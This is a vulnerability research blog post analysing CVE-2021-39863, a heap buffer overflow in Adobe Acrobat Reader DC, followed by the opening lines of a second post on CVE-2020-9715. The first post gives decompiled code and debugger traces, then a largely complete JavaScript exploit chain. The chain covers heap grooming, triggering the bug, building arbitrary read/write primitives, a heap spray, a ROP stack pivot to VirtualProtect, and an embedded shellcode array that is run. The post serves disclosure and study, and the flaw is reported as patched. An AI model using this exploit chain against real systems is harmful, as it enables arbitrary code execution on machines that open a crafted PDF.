Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. It analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-39863

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax

[Truncated]

  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;

[1]

  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )
  {

[2]

    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
    {
LABEL_9:
      *a5 = -2;
      return 0;
    }
    v7 = lpString;
  }
  else
  {

[3]

    v78[1] = v78[0];
  }
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_86;
  }

[4]

  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
  {
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
  }
  else
  {
    v12 = iMaxLength[0];
  }

[5]

  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
  {
    v13 = v12 + 2;
  }
  else
  {
LABEL_25:
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  }
  iMaxLength[1] = v13;

[6]

  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
  {
    *a5 = -7;
    return 0;
  }

[7]

  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);

[8]

  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
  {
    v17 = v78[1] + 2;
  }
  else
  {
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  }
  v78[1] = v17;

[9]

  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
  {
    *a5 = -7;
LABEL_86:
    v5 = 0;
    goto LABEL_87;
  }

[10]

  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;

[11]

  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
  {
    *a5 = v20;
    goto LABEL_86;
  }
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
  {
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  }
  if ( *lpString )
  {
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
    {
      if ( (unsigned __int16)sub_25803155(v50) )
      {
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
        {
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
          --v44;
        }
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
        {
          if ( *v59 != 47 )
          {

[12]

            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
            {
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            }
            if ( v46 )
            {

[13]

              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
              {
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                else
                  *(_BYTE *)v6 = 0;
              }
            }
            if ( v58 )
            {

[14]

              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            }
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          }
          v71 = v58;
          v72 = v59;
        }

[Truncated]

LABEL_87:
  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141

[Truncated]

09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
093499e8  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a08  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a28  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter (i.e. the base URL) is a valid Unicode UTF-16BE encoded string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
{
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
  do
  {
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
      break;
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
      break;
    v3 += 2;
  }
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
LABEL_10:
  if ( !v2 )
    result = v3;
  else
LABEL_12:
    result = -1;
  return result;
}

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

  • The string must terminate with a double null byte.
  • The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter (i.e. the relative URL). At [5] the length of the Source variable (i.e. the base URL) is calculated taking into account its encoding. The function sub_25802A44() is an implementation of the strlen() function that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling the function sub_25802CD5(), which is an implementation of the known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using the function sub_25802D98(), which is an implementation of the strncpy function that works for both Unicode and ANSI encoded strings. These operations performed on the Source variable are equally performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_sub_25818C6A(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[15]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[16]

    sub_258189D6(Destination, Source);
    result = 1;
  }
  else
  {

[17]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [15] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[18]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[19]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[20]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

The exploit does not bypass the following protection mechanisms:

  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

This post analyses CVE-2020-9715, a use-after-free vulnerability affecting several versions of the Adobe Acrobat and Adobe Acrobat Reader products. The vulnerability was discovered by Mark Vincent Yason, who reported it to the Zero Day Initiative (ZDI) disclosure program.

This research was inspired by a detailed blog post by ZDI that analyzed the vulnerability. The exploitation broadly follows the steps outlined in the ZDI blog post, but describes the vulnerability and exploitation steps in more detail.

Overview

